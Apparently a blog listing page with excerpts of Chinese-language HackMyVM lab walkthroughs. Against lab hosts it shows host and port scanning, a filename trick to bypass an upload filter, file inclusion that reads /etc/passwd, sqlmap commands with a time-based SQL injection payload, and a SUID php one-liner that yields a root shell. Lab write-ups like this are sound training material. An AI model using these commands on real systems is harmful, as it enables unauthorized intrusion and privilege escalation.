zon

启动机器

得指定网络接口

sudo arp-scan -I eth5 -l

HMM_zon_image_1

端口扫描

sudo rustscan -a 192.168.10.13 -r 1-65535 -t 8000 --ulimit 5000

sudo nmap 192.168.10.13 -sT -Pn -p22,80 -sV -sC -O -oN portscan/norm


sudo nmap 192.168.10.13 -sT -Pn -p22,80 --script=vuln -oN portscan/vuln

HMM_zon_image_2

HMM_zon_image_3

利用空格绕过文件上传过滤

HMM_zon_image_4

测试之后是检查文件名, 而不是文件头, 而且图片马不能正常解析 HMM_zon_image_5|750

  • 非 jpeg 格式的无法上传 HMM_zon_image_6

  • jpeg 格式能够正常上传 HMM_zon_image_7 HMM_zon_image_8 后面尝试了图片马, 但是没有正常解析, 无法执行命令

使用空格绕过

"webshell.jpeg .php"

HMM_zon_image_9

一句话木马, 获得 webshell HMM_zon_image_10 freddie

阅读全文 →

quick

host discovery

主机发现, 重置了 wsl 的环境之后, 发现能够使用 arp-scan 了 HMM_quick_image_1 前后对比 HMM_quick_image_2

192.168.10.12

port scan

只有一个 80 端口 HMM_quick_image_3

服务版本, 默认脚本, 操作系统扫描 HMM_quick_image_4 漏洞扫描 HMM_quick_image_5

利用远程包含获得 shell

RFI HMM_quick_image_6 HMM_quick_image_7

user. txt PWD

HMM_quick_image_8 HMM_quick_image_9

use SUID file to get root

find / -type f -perm -u=s 2>/dev/null 发现一个suid的 php

./usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);"

root. txt PWD

HMM_quick_image_10

vinylizer

主机发现

使用 nmap 进行主机发现[[THM_Nmap Live Host Discovery(活动主机发现)]]

sudo nmap 192.168.10.1/24 -PA -sn -oN portscan/discovery.nmap

HMM_vinylizer_image_1

192.168.10.10

端口扫描

HMM_vinylizer_image_2 HMM_vinylizer_image_3

web 侦查

HMM_vinylizer_image_4

利用登录页面的 sql 注入

sqlmap

sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login="

HMM_vinylizer_image_5

---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 7762 FROM (SELECT(SLEEP(5)))rBJA) AND 'mJfQ'='mJfQ&password=admin&login=
---

查看所有数据库

 sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --dbs

HMM_vinylizer_image_6 查看数据库的表信息

 sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --tables -D vinyl_marketplace

HMM_vinylizer_image_7 查看某一个表的列信息

sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --columns -D vinyl_marketplace -T users

HMM_vinylizer_image_8 查看对应列的信息

阅读全文 →

zeug_hard

netdiscover

主机发现

启动前 HMM_zeug_image_1|550 启动后, 以后就先导入 VirtualBox 然后导出, 再导入 VMware 算了 HMM_zeug_image_2 靶机 ip 192.168.10.4

端口扫描

HMM_zeug_image_3

HMM_zeug_image_4|700

HMM_zeug_image_5|550 HMM_zeug_image_6|600 HMM_zeug_image_7

FTP 匿名登录

HMM_zeug_image_8

~/workspace cat README.txt
Hi, Cosette, don't forget to disable the debug mode in the web application, we don't want security breaches.

提示有一个 debug 页面可以利用

web 侦查

进去之后是一个上传文件的页面, 先去搜了一下 cve, 因为不确定 cms 名称啥的, 后面搜到了 console 目录, 然后访问了 console 目录, 才确定这是 Werkzeug HMM_zeug_image_9|900 这里的 cve 用不了 想着来目录扫描一下 HMM_zeug_image_10|550

阅读全文 →

quick2

启动靶机前 HMM_quick2_image_1|700 启动后 HMM_quick2_image_2|650 192.168.10.4 HMM_quick2_image_3|600 2024-02-14-20:18:39 后面都是直接用 arp-scan 来扫描某一个网卡的下的局域网ip 了

端口扫描

HMM_quick2_image_4|700

sudo nmap 192.168.10.4 -p22,80 -Pn -sT -sV -O -sC -oA  portscan/nmap

HMM_quick2_image_5|750

sudo nmap 192.168.10.4 -sT -Pn -p20,80 --script=vuln -oA  portscan/vuln

HMM_quick2_image_6|700

web 服务

主页里面在端口扫描的时候发现有一个参数 page 尝试 local file include LFI 获取到了/etc/passwd 在 home 目录下有文件夹的有这两个用户

andrew:x:1000:1000: Andrew Speed:/home/andrew:/bin/bash
nick:x:1001:1001: Nick Greenhorn,,,:/home/nick:/bin/bash

获得了 user. txt

HMM_quick2_image_7|500

HMM_quick2_image_8|483

进行目录扫描 ferox 发现失效了, 以后还是先尝试 gobuster, 不行的话再 feroxbuster HMM_quick2_image_9|750 进入 file. php 页面

阅读全文 →

Search Results